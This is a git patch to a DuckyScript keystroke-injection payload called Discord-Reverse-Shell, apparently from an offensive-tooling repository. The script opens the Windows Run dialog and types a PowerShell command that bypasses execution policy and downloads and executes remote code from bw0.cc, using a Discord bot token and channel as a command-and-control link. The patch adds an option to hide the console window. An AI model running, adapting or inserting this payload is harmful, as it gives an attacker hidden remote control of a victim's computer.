From 555022637ac6c4b9a7b577a98796b23ef5b89505 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 20:46:52 +0000 Subject: [PATCH] Update Discord-Reverse-Shell.txt --- Discord-Reverse-Shell/Discord-Reverse-Shell.txt | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/Discord-Reverse-Shell/Discord-Reverse-Shell.txt b/Discord-Reverse-Shell/Discord-Reverse-Shell.txt index bb2ab10..4476bb8 100644 --- a/Discord-Reverse-Shell/Discord-Reverse-Shell.txt +++ b/Discord-Reverse-Shell/Discord-Reverse-Shell.txt @@ -11,13 +11,12 @@ REM Change BOT_TOKEN below with your bot token REM Change CHANNEL_ID below to your channel id REM for more info goto - https://github.com/beigeworm/PoshCord-C2 -REM some setup for dukie script -DEFAULT_DELAY 100 +REM To hide the console, use $hide='y' below. -REM open powershell (remove "-W H" to show the window) +REM open powershell DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs) +STRING powershell -Ep Bypass -C $hide='y'; $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs) ENTER